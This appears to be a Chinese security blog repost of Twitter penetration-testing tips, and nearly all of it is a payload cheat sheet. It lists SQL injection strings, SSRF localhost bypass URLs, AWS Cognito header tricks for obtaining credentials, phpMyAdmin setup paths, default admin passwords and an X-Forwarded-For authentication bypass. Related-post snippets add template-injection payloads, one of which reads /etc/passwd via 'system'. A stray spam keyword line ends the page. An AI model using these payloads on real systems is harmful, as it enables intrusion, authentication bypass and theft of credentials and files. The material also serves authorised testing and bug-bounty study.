<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Twitter滲透技巧搬運工(一)

    VSole2022-05-13 07:19:14

    快速檢測有無SQL注入

    ' OR 1=1--
    ' OR 1=0--
    %27%20or%201=1
    *(|(object=*))
    )%20or%20('x'='x
    %20or%201=1
    1) or pg_sleep(__TIME__)--
    /**/or/**/1/**/=1
    ' or username like '%
    );waitfor delay '0:0:__TIME__'--
    or isNULL(1/0) /*
    x' or 1=1 or 'x'='y
    

    來源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

    AWS Cognito 配置錯誤

    X-AMZ-Target:AWSCognitoIdentityProviderService.ConfirmSignUp
    X-AMZ-Target:AWSCognitoIdentityProviderService.GetUser
    獲取憑證訪問密鑰 ID 和密鑰 將標頭更改為這樣并觀察響應
    X-AMZ-TARGET:AWSCognitoIdentityService.GetCredentialsForIdentity
    


    來源:

    https://threadreaderapp.com/thread/1522086964262051841.html

    SSRF Bypass技巧

    SSRF Bypasses
    
    http://0.0.0.0
    http://0
    http://0x7f000001
    http://2130706433
    http://0000::1
    http://0000::1:25
    http://0000::1:22
    http://0000::1:3128
    http://2130706433
    http://3232235521
    http://3232235777
    http://2852039166
    http://0o177.0.0.1
    

    來源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

    PHPMyadmin滲透技巧

    當默認憑據在#phpmyadmin登錄時不起作用時,我會嘗試訪問這些路徑
    
    admin/phpMyAdmin/setup/index.php
    phpMyAdmin/main.php
    phpmyadmin/pma/
    Admin/setup/index.php
    phpmyadmin/admin/setup/index.php
    phpmyadmin/setup/
    phpmyadmin/setup/index.php
    

    來源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q

    找到管理員登錄口,可以嘗試以下賬號密碼

    admin:admin
    admin:a
    admin:12346578
    test:test
    guest:guest
    anonymous:anonymous
    admin:password
    admin:
    root:toor
    root:passw0rd
    root:root
    guest:test
    $sub_name:password
    ADMIN:ADMIN
    Admin:Admin
    :
    a:a
    

    來源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA

    漏洞挖掘小技巧-身份繞過小技巧,修改XFF頭

    Authentication bypass.... 
    
    Using custom header (See attached screenshot):
    
    X-Forwarded-For: 127.0.0.1
    


    來源:https://twitter.com/BountyOverflow/status/1523264249442627590?s=20&t=aInLegLknUcam2qSjbt2PA

    文章轉載:Hack學習呀

    黑白之道發布、轉載的文章中所涉及的技術、思路和工具僅供以安全為目的的學習交流使用,任何人不得將其用于非法用途及盈利等目的,否則后果自行承擔!

    admintwitter
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    快速檢測有無SQL注入' OR 1=1--. 獲取憑證訪問密鑰?將標頭更改為這樣并觀察響應
    ' OR 1=1-- ' OR 1=0-- %27%20or%201=1 *(|(object=*)) )%20or%20('x'='x %20or%201=1 1) or pg_sleep(__TIME__)-- /**/or/**/1/**/=1 ' or username like '% );waitfor delay '0:0:__TIME__'-- or isNULL(1/0) /* x
    {2*2}[[7*7]] {{7*7}} {{7*'7'}} <%= 7 * 7 %> {{ request }} {{self}} {{dump(app)}} #{3*3} #{ 3 * 3 } {{ ''.__class__.__mro__[2].__subclasses__() }} {{['cat%20/etc/passwd']|filter('system')}}
    Twitter滲透技巧搬運工
    2022-05-18 07:38:15
    Twitter滲透技巧搬運工
    一個功能強大的漏洞管理平臺和DevSecOps解決方案
    Sensor可以配置卸載保護,防止在沒有特殊令牌的情況下將其刪除。Modzero不想通過CrowdStrike的基于HackerOne的漏洞賞金計劃報告其發現,并且披露過程并不順利。6月初,Modzero開始向CrowdStrike詢問報告其調查結果的另一種方式,即不涉及HackerOne或簽署保密協議的方式。Modzero表示,它設法繞過了CrowdStrike的反措施,并決定公開其調查結果。
    威脅者正在尋找通常存儲在ENV文件中的API令牌,密碼和數據庫登錄名。由于它們保存的數據的性質,ENV文件應始終存儲在受保護的文件夾中。超過2800個不同的IP地址已經被用來掃描ENV文件,在過去的三年中,有超過1100臺掃描儀是活躍在過去一個月內,據安全廠商Greynoise。建議開發人員進行測試,看看他們的應用程序的ENV文件是否可以在線訪問,然后保護任何意外暴露的ENV文件。
    2021年10月期間,網絡上出現了一支名為AgainstTheWest(以下簡稱“ATW”)的黑客組織,特別
    前言本文通過多個 poc ,結合ftp協議底層和php源碼,分析了在 php 中利用 ftp 偽協議攻擊 php-fpm ,從而繞過 disable_functions 的攻擊方法,并在文末復現了 [藍帽杯 2021]One Pointer PHP 和 [WMCTF2021] Make PHP Great Again And Again。
    mysql提權總結
    2021-09-17 15:04:08
    使用過MySQL的人都知道,MySQL有很多內置函數提供給使用者,包括字符串函數、數值函數、日期和時間函數等,給開發人員和使用者帶來了很多方便。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类